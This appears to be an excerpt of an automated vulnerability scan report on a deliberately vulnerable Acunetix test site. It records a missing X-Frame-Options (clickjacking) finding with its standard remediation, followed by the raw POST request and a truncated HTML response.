solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>Parameter X-Frame-OptionsSolution Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY. Alternatively consider implementing Content Security Policy's "frame-ancestors" directive.
POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=0
Alert tags Alert description X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.
Request Request line and header section (455 bytes)
POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=0 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0 Content-Length: 6567 Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232Request body (6567 bytes)
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA%2BPHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc%2BICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8%2BbmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A%2BICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A%2BICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A%2BICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA%2BLSBTdXBwb3J0IGZvciBJUHY2PGJyIC8%2BICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8%2BICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8%2BICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA%2BVGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E%2BLjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A%2BICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BVXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc%2BQWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BRm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A%2BZAIJDw8WAh4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg%2FaWQ9MGRkAgsPFgIeA3NyYwUMYWRzL2RlZi5odG1sZGTxtiNRXSWMk2xH7U3KJPX1k9tDKQ%3D%3D&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwLWjL6iDQK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ%2Bdfic04fJFrwdgOeBd3JBjK63E5g%3D%3DResponse Status line and header section (222 bytes)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Mon, 25 Jul 2022 13:05:20 GMT Content-Length: 22784Response body (22784 bytes)
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&id=0" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA+PHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc+ICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8+bmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A+ICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A+ICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA+LSBTdXBwb3J0IGZvciBJUHY2PGJyIC8+ICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8+ICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8+ICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA+VGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E+LjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYX